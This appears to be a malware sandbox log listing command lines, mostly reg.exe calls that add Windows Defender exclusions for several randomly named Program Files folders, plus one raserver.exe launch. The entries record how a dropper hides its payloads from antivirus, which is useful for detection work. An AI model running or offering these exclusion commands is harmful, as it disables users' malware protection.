- '%WINDIR%\syswow64\reg.exe' ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "%ProgramFiles(x86)%\DpxdYUHugxkU2" /t REG_DWORD /d 0 /reg:32
- '%WINDIR%\syswow64\reg.exe' ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "%ProgramFiles(x86)%\DpxdYUHugxkU2" /t REG_DWORD /d 0 /reg:32
- '%WINDIR%\syswow64\reg.exe' ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "%ProgramFiles(x86)%\DpxdYUHugxkU2" /t REG_DWORD /d 0 /reg:64
- '%WINDIR%\syswow64\reg.exe' ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "%ProgramFiles(x86)%\DpxdYUHugxkU2" /t REG_DWORD /d 0 /reg:64
- '%WINDIR%\syswow64\reg.exe' ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "%ProgramFiles(x86)%\OWSSrnicdgUn" /t REG_DWORD /d 0 /reg:32
- '%WINDIR%\syswow64\reg.exe' ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "%ProgramFiles(x86)%\OWSSrnicdgUn" /t REG_DWORD /d 0 /reg:32
- '%WINDIR%\syswow64\reg.exe' ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "%ProgramFiles(x86)%\OWSSrnicdgUn" /t REG_DWORD /d 0 /reg:64
- '%WINDIR%\syswow64\reg.exe' ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "%ProgramFiles(x86)%\OWSSrnicdgUn" /t REG_DWORD /d 0 /reg:64
- '%WINDIR%\syswow64\reg.exe' ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "%ProgramFiles(x86)%\dhSebCetEbdRqsxofFR" /t REG_DWORD /d 0 /reg:32
- '%WINDIR%\syswow64\reg.exe' ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "%ProgramFiles(x86)%\dhSebCetEbdRqsxofFR" /t REG_DWORD /d 0 /reg:32
- '%WINDIR%\syswow64\reg.exe' ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "%ProgramFiles(x86)%\dhSebCetEbdRqsxofFR" /t REG_DWORD /d 0 /reg:64
- '%WINDIR%\syswow64\reg.exe' ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "%ProgramFiles(x86)%\dhSebCetEbdRqsxofFR" /t REG_DWORD /d 0 /reg:64
- '%WINDIR%\syswow64\reg.exe' ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "%ProgramFiles(x86)%\eTvJFEwqSVAUC" /t REG_DWORD /d 0 /reg:32
- '%WINDIR%\syswow64\reg.exe' ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "%ProgramFiles(x86)%\eTvJFEwqSVAUC" /t REG_DWORD /d 0 /reg:32
- '%WINDIR%\syswow64\reg.exe' ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "%ProgramFiles(x86)%\eTvJFEwqSVAUC" /t REG_DWORD /d 0 /reg:64
- '%WINDIR%\syswow64\reg.exe' ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "%ProgramFiles(x86)%\jTOLnVBblIE" /t REG_DWORD /d 0 /reg:32
- '<SYSTEM32>\raserver.exe' /offerraupdate